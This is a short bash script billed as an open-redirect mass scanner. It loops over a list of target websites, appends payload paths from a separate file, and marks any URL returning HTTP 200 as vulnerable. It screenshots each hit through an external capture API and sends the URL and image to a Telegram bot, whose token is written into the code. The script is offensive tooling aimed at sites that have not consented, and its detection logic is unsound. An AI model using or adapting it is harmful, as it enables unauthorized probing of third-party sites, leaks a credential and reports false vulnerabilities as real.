
#!/bin/bash
#openredirect Mass Scanner By Adelittle
#0byte,IDX,ISD-Team
LISTS=$1

if [[ ! -f ${LISTS} ]]; then
	echo "ERROR: ${LISTS} not found"
	echo "usage: bash $0 list.txt"
	exit
fi

list(){
	IFS=$'\n'
	for SITE in $(cat $LISTS); do
		echo "Scanning >>> ${SITE}"
			for vuln in $(cat vuln.txt); do
			string=$(echo $vuln | cut -f 1 | tr -d '\r');

		
	if [[ $(curl -A "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0" -o /dev/null -s -w "%{http_code}\n" "https://${SITE}${string}" ) =~ '200' ]]; then
                echo "[+] VULN: ${SITE}${string}"
                echo "https://${SITE}${string}" >> scan_res.txt
                wget "https://capture-website-api.herokuapp.com/capture?url=${SITE}${string}" -O ss.jpg
                curl "https://api.telegram.org/bot{2125246923:AAGdbu32Ysjdtzn96aI-BT7SQrxwXnAQ2qY}/sendMessage?text={https://${SITE}${string}}&chat_id={1851935675}"
                curl "https://api.telegram.org/bot{2125246923:AAGdbu32Ysjdtzn96aI-BT7SQrxwXnAQ2qY}/sendPhoto" -F chat_id=1851935675 -F photo="@ss.jpg"
	else
		echo "NOT VULN: ${SITE}${string}"
	fi
			done
	done
}
list

export -f list
echo -e "===============[Let's Go!]==============="
sort -u $SITE | xargs -P 50 -n1 bash -c 'list "$@"' _
